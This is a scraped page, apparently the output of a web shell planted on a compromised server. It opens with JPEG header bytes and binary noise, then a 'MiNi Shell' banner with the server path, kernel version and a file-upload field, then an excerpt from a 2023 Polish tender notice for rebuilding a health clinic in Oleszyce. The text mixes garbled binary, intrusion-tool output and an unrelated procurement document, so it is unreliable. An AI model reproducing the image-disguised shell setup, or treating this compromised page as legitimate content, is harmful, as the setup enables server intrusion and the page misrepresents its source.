JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230517/0021994701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i termomodernizacja budynku Przychodni Zdrowia w Oleszycach <br/>i modernizacja Centrum Rekreacyjno-Sportowego w Oleszycach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Oleszyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900619</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-630</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@oleszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.oleszyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i termomodernizacja budynku Przychodni Zdrowia w Oleszycach <br/>i modernizacja Centrum Rekreacyjno-Sportowego w Oleszycach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d9f293f5-f48e-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00219947</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00036126/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa i termomodernizacja budynku Przychodni Zdrowia w Oleszycach i modernizacja Centrum Rekreacyjno-Sportowego w Oleszycach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/oleszyce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/oleszyce</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">komputer klasy PC z dostępem do internetu</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGP.271.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia polega na zaprojektowaniu i realizacji zamierzenia budowlanego przebudowy, rozbudowy,<br/>nadbudowy budynku usługowo-biurowego wraz z projektem zagospodarowania terenu.<br/>Zamówienie realizowane będzie w systemie tzw. „zaprojektuj i wybuduj” i ma na celu dostosowanie obiektu budowlanego do<br/>warunków technicznych i funkcjonalnych założonych przez program funkcjonalno użytkowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nowe pokrycie dachowe budynku przychodni zdrowia na części wyższej.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria:<br/>1) cena (waga 60%)<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali<br/>1-60 obliczone według wzoru:<br/>„Pc” : Najniższa oferowana cena brutto<br/>Cena badanej oferty brutto<br/>x 60<br/>Pc – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>2) Okres gwarancji (waga 40%) – nie może być on krótszy niż 36 miesięcy i nie dłuższy niż 60 miesięcy od dnia odbioru końcowego<br/>Kryterium – „Okres gwarancji” – poszczególnym ofertom zostaną przyznane punkty za okres gwarancji w skali do 40 pkt obliczone<br/>według wzoru:<br/>„Pg” : Okres gwarancji na wykonane roboty budowlane badanej oferty Najdłuższy okres gwarancji z otrzymanych ofert x 40<br/>Pg – ilość punktów przyznanych Wykonawcy dla kryterium „okres gwarancji”<br/>Wymagany minimalny okres gwarancji to 36 miesięcy.<br/>W przypadku niepodania przez Wykonawcę okresu gwarancji, Zamawiający przyjmie minimalny okres gwarancji jakości, tj. 36<br/>miesięcy od daty odbioru końcowego przedmiotu umowy. Jeżeli Wykonawca zaproponuje okres gwarancji dłuższy niż 60 miesięcy,<br/>do obliczenia punktów za to kryterium zostanie przyjęty 60-miesięczny okres gwarancji, jako maksymalny odpowiadający<br/>wymaganiom Zamawiającego. Oferowany okres gwarancji należy podać w pełnych miesiącach.<br/>Zamawiający do oceny kryterium „okres gwarancji” pobierze dane z oferty Wykonawcy.<br/>3) Łączna ocena oferty:<br/>P = Pc + Pg<br/>P – sumaryczna ilość punktów<br/>Pc – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>Pg – ilość punktów przyznanych Wykonawcy dla kryterium „Okres gwarancji”<br/>Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie oceniona jako najkorzystniejsza tzn. uzyska najwyższą<br/>liczbę punktów w łącznej ocenie ofert. Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt.<br/>3. Zamawiający zastosuje zaokrąglanie wyników oceny do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki<br/>udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa.<br/>3) sytuacji ekonomicznej lub finansowej;<br/>Zamawiający określa wymagania, opis poniżej.<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/>a) posiada środki finansowe lub zdolność kredytową w wysokości co najmniej:<br/>2 500 000,00 zł,<br/>b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną w wysokości co najmniej:<br/>2 500 000,00 zł,<br/>4) zdolności technicznej lub zawodowej;<br/>Zamawiający określa wymagania, opis poniżej.<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/>a) posiada doświadczenie w wykonaniu co najmniej:<br/>− 2 robót budowlanych polegających na budowie (należy przez to rozumieć wykonywanie obiektu budowlanego w<br/>określonym miejscu, a także odbudowę, rozbudowę, nadbudowę obiektu budowlanego) i/lub modernizacji obiektu<br/>użyteczności publicznej lub obiektu zamieszkania zbiorowego, o łącznej wartości dwóch (2) robót nie mniejszej niż: 4 000<br/>000,00 zł brutto,<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty; (wg załącznika nr 4 do swz).<br/>b) Wykonawca spełni warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował:<br/> co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności konstrukcyjno–budowlanej do projektowania<br/>w odniesieniu do konstrukcji oraz architektury obiektu oraz: co najmniej 5-letnie doświadczenie w zakresie projektowania,<br/>udokumentowane wykonanie projektu w specjalności konstrukcyjno-budowlanej co najmniej jednego obiektu użyteczności<br/>publicznej lub zamieszkania zbiorowego,<br/> co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń cieplnych, wentylacyjnych, klimatyzacji, gazowych, wodociągowych i kanalizacyjnych uprawniające do<br/>projektowania obiektu oraz: co najmniej 5-letnie doświadczenie w zakresie projektowania w specjalności instalacyjnej z<br/>wykorzystaniem uprawnień, o których mowa wyżej,<br/> co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych uprawniające do projektowania obiektu budowlanego oraz: co najmniej 5 lat<br/>doświadczenia zawodowego w projektowaniu instalacji elektrycznych z wykorzystaniem uprawnień, o których mowa wyżej,<br/> co najmniej jedną osobą skierowaną do realizacji zamówienia, która pełnić będzie funkcję kierownika budowy posiadającą<br/>uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej<br/>oraz co najmniej 5-letnie doświadczenie w zakresie kierowania robotami budowlanymi (liczone od dnia uzyskania<br/>uprawnień) w tym doświadczenie w pełnieniu funkcji kierownika budowy na co najmniej jednym obiekcie użyteczności<br/>publicznej lub zamieszkania zbiorowego,<br/> co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz: co najmniej 5-letnie doświadczenie<br/>w zakresie kierowania robotami (liczone od dnia uzyskania uprawnień) w specjalności instalacyjnej z wykorzystaniem<br/>uprawnień, o których mowa wyżej,<br/> co najmniej jedną osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych, oraz: co najmniej 5-letnie doświadczenie w zakresie kierowania robotami<br/>(liczone od dnia uzyskania uprawnień) w specjalności instalacyjnej z wykorzystaniem uprawnień, o których mowa wyżej, (wg<br/>załącznika nr 11 do swz). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem (zgodnie z<br/>warunkiem określonym w Rozdziale 9 – pkt 1 ppkt 3 lit. a);<br/>2) dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia (zgodnie z warunkiem<br/>określonym w Rozdziale 9 – pkt 1 ppkt 3 lit. b);<br/>3) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty; (zgodnie z warunkiem określonym w Rozdziale 9 - pkt 1 ppkt 4 lit. a) SWZ (wg załącznika nr 4 do swz);<br/>4) Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także za wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wg podanego wzoru „Wykaz osób<br/>skierowanych przez Wykonawcę do realizacji zamówienia”, wskazanych (zgodnie z warunkiem określonym w Rozdziale 9 - pkt 1<br/>ppkt 4 lit. b) SWZ (wg załącznika nr 11 do swz) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do postępowania Wykonawcy przed upływem terminu składania ofert zobowiązani są wnieść wadium w<br/>wysokości:<br/>30 000,00 zł (słownie: trzydzieści tysięcy złotych)<br/>Wadium należy wnieść w jednej lub kilku formach przewidzianych w art.97 ust.7 uPzp: pieniądzu; gwarancjach bankowych;<br/>gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty o których mowa w art.6b ust.5 pkt 2 ustawy z<br/>9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert i utrzymać nieprzerwanie do dnia<br/>upływu terminu związania ofertą z wyjątkiem przypadków zgodnie z art.98 ust.1 pkt 2 i 3 oraz ust.2 uPzp.<br/>Wadium w pieniądzu należy przelać na konto Zamawiającego określone w SWZ.<br/>W przypadku wadium wnoszonego w pieniądzu za termin wpłynięcia wadium uznaje się termin jego ,,wniesienia”.<br/>Wniesienie - uznanie kwoty wadium przez rachunek Zamawiającego.<br/>W przypadku wadium w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub<br/>poręczenia w postaci elektronicznej.<br/>Wadium wniesione w formie innej niż pieniężna musi spełniać wymagania: odpowiadać co do wartości wysokości wadium<br/>określonej w SWZ, musi odpowiadać co do terminu ważności terminowi związania ofertą określonemu w SWZ, zawierać w<br/>treści okoliczności zgodne z art.98 ust.6 uPzp.<br/>Zamawiający zwróci wadium niezwłocznie nie później niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>upływu terminu związania ofertą; zawarcia umowy w sprawie zamówienia publicznego; unieważnienia postępowania o<br/>udzielenie zamówienia z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia lub nie<br/>upłynął termin do jego wniesienia.<br/>Zamawiający niezwłocznie nie później niż w terminie 7 dni od dnia złożenia wniosku zwróci wadium wykonawcy: który<br/>wycofał ofertę przed upływem terminu składania ofert; którego oferta została odrzucona; po wyborze najkorzystniejszej<br/>oferty z wyjątkiem wykonawcy którego oferta została wybrana jako najkorzystniejsza; po unieważnieniu postępowania w<br/>przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi<br/>oświadczenia o zwolnieniu wadium.<br/>Złożenie wniosku o zwrot wadium powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa<br/>do korzystania ze środków ochrony prawnej o których mowa w uPzp.<br/>Zgodnie z art.98 ust.6 uPzp Zamawiający zatrzyma wadium wraz z odsetkami a w przypadku wadium wniesionego w formie<br/>gwarancji lub poręczenia wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium jeżeli:<br/>wykonawca w odpowiedzi na wezwanie o którym mowa w art.107 ust.2 lub art.128 ust.1 z przyczyn leżących po jego stronie<br/>nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności o<br/>których mowa w art.57 lub art.106 ust.1, oświadczenia o którym mowa w art.125 ust.1 innych dokumentów lub oświadczeń<br/>lub nie wyraził zgody na poprawienie omyłki o której mowa w art.223 ust.2 pkt 3 co spowodowało brak możliwości wybrania<br/>oferty złożonej przez wykonawcę jako najkorzystniejszej;<br/>wykonawca którego oferta została wybrana: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w ofercie, nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy<br/>którego oferta została wybrana.<br/>Wykonawca lub podmiot wystawiający gwarancję bankową/ubezpieczeniową nie może uzależnić dokonania zapłaty od<br/>spełnienia jakichkolwiek dodatkowych warunków lub wykonania czynności, również od przedłożenia dodatkowej<br/>dokumentacji, dodatkowych oświadczeń złożonych przez wykonawcę lub inny podmiot pod rygorem odrzucenia oferty<br/>Wykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span 